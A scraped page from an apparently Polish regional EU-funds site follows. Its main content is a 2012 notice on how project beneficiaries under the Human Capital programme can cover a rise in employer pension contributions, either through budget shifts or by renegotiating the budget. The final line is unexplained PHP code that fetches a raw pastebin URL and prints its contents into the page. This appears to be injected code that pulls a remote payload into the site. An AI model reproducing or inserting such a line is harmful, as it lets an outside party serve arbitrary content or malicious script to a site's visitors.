Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

27.02.2012 Zwiększenie wymiaru obowiązkowej składki rentowej w części finansowanej przez pracodawcę

Przedstawiamy Państwu stanowisko Instytucji Zarządzającej Programem Operacyjnym Kapitał Ludzki dotyczące zwiększenia wydatków po stronie Beneficjenta na skutek nowelizacji ustawy z dnia 13 października 1998 r. o systemie ubezpieczeń społecznych (Dz. U. z 2009 r., Nr 205, poz. 1585, z późn. zm.), w wyniku której zwiększył się wymiar obowiązkowej składki rentowej w części finansowanej przez pracodawcę.

W opinii IZ, w powyższej sytuacji, tj. w przypadku zmiany prawa, skutkującej zwiększeniem wydatków po stronie Beneficjenta, możliwe jest:

W pierwszej kolejności - wykorzystanie oszczędności na pokrycie zwiększonych kosztów (w tym przesunięcie środków pomiędzy zadaniami). Zgodnie z zasadą elastyczności budżetu, Beneficjent rozliczany jest ze zrealizowanych zadań w ramach projektu, nie zaś ze zgodności poniesionych przez niego wydatków z poszczególnymi pozycjami Szczegółowego budżetu. Wytyczne w zakresie kwalifikowania wydatków w ramach PO KL wiążą Beneficjenta limitami wydatków określonymi dla każdego zadania w budżecie projektu w zatwierdzonym wniosku o dofinansowanie projektu. Możliwe jest jednak, zachowując ogólne zasady kwalifikowalności, ponoszenie w ramach danego zadania wydatków odmiennych (w zakresie wysokości i/lub charakteru) od założonych w budżecie. Wytyczne dopuszczają dokonywanie przez Beneficjenta, bez zgody podmiotu będącego stroną umowy o dofinansowanie przesunięć w budżecie projektu określonym w zatwierdzonym wniosku o dofinansowanie projektu do 10 % wartości środków alokowanych na zadanie, z którego są przesuwane środki oraz na zadanie, na które są przesuwane środki. Przesunięcia nie mogą zwiększać wartości zadania odnoszącego się do zarządzania projektem, ani zwiększać łącznej kwoty wydatków na wynagrodzenie personelu zarządzającego projektem. Beneficjent, za zgodą podmiotu będącego stroną umowy o dofinansowanie, ma możliwość wykorzystania oszczędności powstałych w wyniku przeprowadzenia postępowania o udzielenie zamówienia publicznego lub zasady konkurencyjności, przekraczających 10 % środków alokowanych na zadanie, o ile wykaże on, iż konieczność przeznaczenia oszczędności na pokrycie wydatków poniesionych w wysokości większej niż zaplanowana, jest wynikiem znacznego wzrostu cen. W opinii IZ dopuszcza się pokrycie wydatków wynikających ze wzrostu składki rentowej z oszczędności powstałych na skutek przeprowadzenia postępowania o udzielenie zamówienia publicznego lub zasady konkurencyjności.

W przypadku braku oszczędności – negocjowanie budżetu. W opinii IZ Instytucja Pośrednicząca (IP)/Instytucja Wdrażająca (Instytucja Pośrednicząca II stopnia – IW/IP2) nie powinna odmówić Beneficjentowi zwiększenia dofinansowania wynikającego wyłącznie z ww. sytuacji, o ile posiada dostępną alokację i Beneficjent o to wnioskuje. Możliwość podjęcia negocjacji wynika z Wytycznych (3.1 Podstawowe zasady kwalifikowania wydatków, pkt 2), wskazujących, iż w przypadku zmian w prawie krajowym lub wspólnotowym wpływających na wysokość wydatków kwalifikowanych w projekcie, podmiot będący stroną umowy negocjuje z Beneficjentem ewentualne zmiany w budżecie projektu.

Dokument do pobrania


<- Wstecz do: Aktualności

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");